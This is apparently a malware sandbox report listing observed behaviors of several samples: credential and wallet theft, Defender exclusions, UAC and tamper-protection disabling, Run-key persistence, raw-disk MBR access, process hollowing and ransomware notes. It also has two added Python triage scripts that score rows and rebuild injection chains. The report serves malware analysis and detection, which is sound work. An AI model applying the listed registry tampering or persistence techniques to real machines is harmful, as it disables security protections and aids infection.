N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\Desktop\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP2663 = "C:\\Users\\Admin\\AppData\\Local\\RageMP2663\\RageMP2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest2663 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest2663\\MaxLoonaFest2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\\AdobeUpdaterV2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Desktop\a\lenin.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\E: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Desktop\a\ld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
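Three kinds of row in this section carry most of the weight for a triage analyst: the Run-key writes (user-level persistence), the EnableLUA writes (the signature is named "Checks whether UAC is enabled", but a Set value of 0 turns UAC off for every user at the next logon, whereas the Key value queried rows alone are what many legitimate installers do), and the writable handle to \??\PhysicalDrive0 (a raw-disk handle that bypasses the file system, which is how MBR-level bootkits and wipers write, and also what some disk utilities do). The following is an added example, not part of the sandbox report and not the sandbox's own signature code: a rule-based scorer over rows in the report's flattened "Description Indicator Process Target" layout. The sample rows are copied from this page; the rule names and weights, and the C:\Windows\Tasks\*.job rule taken from the "Drops file in Windows directory" table, are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Rows copied from the signature tables on this page. The sandbox flattens
# each table row to "Description Indicator Process Target" separated by
# single spaces; that is the only layout this parser understands.
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Desktop\a\lenin.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\a\New.exe N/A',
    r'File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A',
    r'File created C:\Windows\Tasks\axplont.job C:\Users\Admin\Desktop\a\random.exe N/A',
    r'File opened (read-only) \??\E: C:\Program Files\Google\Chrome\Application\chrome.exe N/A',
]


@dataclass(frozen=True)
class Row:
    desc: str
    indicator: str
    process: str
    target: str


# The description is one of a fixed set of sandbox verbs. The process is the
# first drive-letter path that follows the indicator, and the target is N/A
# or another drive-letter path. Indicators never contain " X:\" themselves.
ROW_RE = re.compile(
    r"^(?P<desc>Set value \((?:str|int|data)\)|Key value queried|Key opened|Key created|"
    r"File opened for modification|File opened \(read-only\)|File created) "
    r"(?P<indicator>.+?) (?P<process>[A-Z]:\\.+?) (?P<target>N/A|[A-Z]:\\.+)$"
)


def parse_row(line: str) -> Optional[Row]:
    m = ROW_RE.match(line.strip())
    return Row(**m.groupdict()) if m else None


def _run_key(r: Row) -> bool:
    # Writes (not reads) under HKCU/HKLM ...\CurrentVersion\Run\<name>.
    return r.desc.startswith("Set value") and "\\CurrentVersion\\Run\\" in r.indicator


def _uac_disabled(r: Row) -> bool:
    # EnableLUA = 0 turns UAC off for every user at the next logon. Merely
    # querying the value (New.exe above) is routine for installers; not flagged.
    return r.desc.startswith("Set value") and r.indicator.endswith('\\EnableLUA = "0"')


def _raw_disk_handle(r: Row) -> bool:
    # A writable handle to \??\PhysicalDriveN bypasses the file system; this is
    # how MBR bootkits and wipers write, and also what some disk utilities do.
    return r.desc == "File opened for modification" and r.indicator.lower().startswith("\\??\\physicaldrive")


def _legacy_job(r: Row) -> bool:
    # C:\Windows\Tasks\*.job is the old AT-style task store, still honoured by
    # the Task Scheduler service; a dropped .job survives reboot without schtasks.
    low = r.indicator.lower()
    return r.desc == "File created" and "\\windows\\tasks\\" in low and low.endswith(".job")


# (rule name, weight, predicate); names and weights are this example's own.
RULES: List[Tuple[str, int, Callable[[Row], bool]]] = [
    ("persistence.run_key", 3, _run_key),
    ("evasion.uac_disabled", 5, _uac_disabled),
    ("bootkit.raw_disk_handle", 5, _raw_disk_handle),
    ("persistence.legacy_job", 3, _legacy_job),
]


def triage(lines: List[str]) -> Dict[str, Dict]:
    """Score each process by the rules its rows hit; unparsable lines are skipped."""
    hits: Dict[str, Dict] = {}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        for name, weight, pred in RULES:
            if pred(row):
                entry = hits.setdefault(row.process, {"score": 0, "rules": []})
                entry["score"] += weight
                entry["rules"].append(name)
    return hits


if __name__ == "__main__":
    ranked = sorted(triage(SAMPLE_ROWS).items(), key=lambda kv: -kv[1]["score"])
    for proc, info in ranked:
        print(f'{info["score"]:>2}  {proc}  [{", ".join(info["rules"])}]')
```

The query-only EnableLUA row from New.exe deliberately produces no hit: scoring reads of that value would flag most setup programs. The raw-disk rule fires on the handle open alone because the sandbox does not record what was written; confirm an actual MBR overwrite by diffing sector 0 of the detonation disk image before ranking the sample as a bootkit.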

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 632 set thread context of 1076 N/A C:\Users\Admin\Desktop\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5424 set thread context of 1792 N/A C:\Users\Admin\Desktop\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 4564 set thread context of 640 N/A C:\Users\Admin\Desktop\a\volumeinfo.exe C:\Users\Admin\Desktop\a\volumeinfo.exe
PID 2832 set thread context of 5960 N/A C:\Users\Admin\Desktop\a\RambledMimets.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5596 set thread context of 6152 N/A C:\Users\Admin\Desktop\a\CapSimple.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5528 set thread context of 6060 N/A C:\Users\Admin\Desktop\a\RambledMime.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6060 set thread context of 6292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6936 set thread context of 5284 N/A C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8340 set thread context of 8628 N/A C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5284 set thread context of 8924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8072 set thread context of 6236 N/A C:\Users\Admin\Desktop\a\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 5036 set thread context of 6780 N/A C:\Users\Admin\Desktop\a\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8628 set thread context of 7316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5676 set thread context of 5016 N/A C:\Users\Admin\Desktop\a\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 7036 set thread context of 7384 N/A C:\Users\Admin\Desktop\a\alex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8476 set thread context of 6296 N/A C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
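Almost every row in the SetThreadContext table has the same shape: an executable in a user-writable directory (Desktop, Pictures, AppData\Local\Temp) sets the thread context of a freshly started, signed .NET framework utility (RegAsm.exe, CasPol.exe, regsvcs.exe), which is the process-hollowing pattern .NET loaders use to run a stealer or RAT payload under a trusted image name. Three rows (6060 to 6292, 5284 to 8924, 8628 to 7316) show the hollowed RegAsm.exe injecting into a second RegAsm.exe, so the final payload is two hops away from the dropped file, and one row (volumeinfo.exe into volumeinfo.exe) is a packer unpacking into a copy of itself rather than hollowing a system binary. The following is an added example, not part of the report and not the sandbox's own code: it parses these rows, rebuilds the injection chains from each root PID, and labels each chain. The sample rows are copied from the table above; the list of hollowing hosts beyond the three seen here and the "trusted directory" prefixes are the example's own assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Rows copied from the "Suspicious use of SetThreadContext" table on this page.
# Layout: "PID <src> set thread context of <dst> N/A <src image> <dst image>".
SAMPLE_ROWS = [
    r"PID 632 set thread context of 1076 N/A C:\Users\Admin\Desktop\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    r"PID 5424 set thread context of 1792 N/A C:\Users\Admin\Desktop\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
    r"PID 4564 set thread context of 640 N/A C:\Users\Admin\Desktop\a\volumeinfo.exe C:\Users\Admin\Desktop\a\volumeinfo.exe",
    r"PID 5528 set thread context of 6060 N/A C:\Users\Admin\Desktop\a\RambledMime.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    r"PID 6060 set thread context of 6292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    r"PID 6936 set thread context of 5284 N/A C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    r"PID 5284 set thread context of 8924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    r"PID 8072 set thread context of 6236 N/A C:\Users\Admin\Desktop\a\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
]

ROW_RE = re.compile(
    r"^PID (?P<src_pid>\d+) set thread context of (?P<dst_pid>\d+) N/A "
    r"(?P<src>[A-Z]:\\.+?) (?P<dst>[A-Z]:\\.+)$"
)

# Signed .NET framework utilities commonly started suspended and overwritten
# by .NET loaders. The first three are the ones this report shows; the rest
# are this example's assumption about what else to watch.
HOLLOW_HOSTS = {"regasm.exe", "caspol.exe", "regsvcs.exe",
                "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

Edge = Tuple[int, int, str, str]  # (src_pid, dst_pid, src_image, dst_image)


def parse_rows(lines: List[str]) -> List[Edge]:
    edges: List[Edge] = []
    for line in lines:
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((int(m["src_pid"]), int(m["dst_pid"]), m["src"], m["dst"]))
    return edges


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def injection_chains(edges: List[Edge]) -> List[List[Tuple[int, str]]]:
    """Follow src->dst edges from every root (a PID nobody injected into) and
    return each complete chain as [(pid, image), ...]."""
    by_src: Dict[int, List[Tuple[int, str]]] = defaultdict(list)
    image: Dict[int, str] = {}
    targeted = set()
    for s_pid, d_pid, s_img, d_img in edges:
        by_src[s_pid].append((d_pid, d_img))
        image.setdefault(s_pid, s_img)
        image[d_pid] = d_img
        targeted.add(d_pid)

    chains: List[List[Tuple[int, str]]] = []

    def walk(pid: int, path: List[Tuple[int, str]]) -> None:
        seen = {p for p, _ in path}  # guard against PID reuse creating a loop
        nexts = [n for n in by_src.get(pid, []) if n[0] not in seen]
        if not nexts:
            chains.append(path)
        for d_pid, d_img in nexts:
            walk(d_pid, path + [(d_pid, d_img)])

    for root in sorted(p for p in by_src if p not in targeted):
        walk(root, [(root, image[root])])
    return chains


def classify(chain: List[Tuple[int, str]]) -> Dict[str, object]:
    """Label one chain. 'hollowing': an image outside the trusted directories
    ends up owning a framework host's thread context; 'self_injection': every
    hop is the same image (RunPE into a fresh copy of itself, typical of packers)."""
    root_img = chain[0][1]
    hosts = [img for _, img in chain[1:] if _base(img) in HOLLOW_HOSTS and _trusted(img)]
    if hosts and not _trusted(root_img):
        kind = "hollowing"
    elif len(chain) > 1 and all(_base(img) == _base(root_img) for _, img in chain):
        kind = "self_injection"
    else:
        kind = "review"
    return {"kind": kind, "hops": len(chain) - 1, "root": root_img, "hosts": hosts}


if __name__ == "__main__":
    for chain in injection_chains(parse_rows(SAMPLE_ROWS)):
        v = classify(chain)
        print(f'{v["kind"]:<15} hops={v["hops"]}  ' + " -> ".join(f"{p}:{_base(i)}" for p, i in chain))
```

For memory acquisition this chain view tells you which PIDs to dump: the leaf of each chain (1076, 1792, 6292, 8924, 6236) holds the unpacked payload, while the root is usually only the packed loader. In a live environment the same logic applies to Sysmon event ID 8 (CreateRemoteThread) or 10 (ProcessAccess) pairs, with the caveat that SetThreadContext on a suspended child is not itself visible to Sysmon, so the process-creation event with a suspended framework utility as the child is the complementary signal.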

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-125_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\23.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_crop_handles.mp4 C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxSignature.p7x C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\he-il\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64_altform-unplated.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-black_scale-125.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\MediumTile.scale-200_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
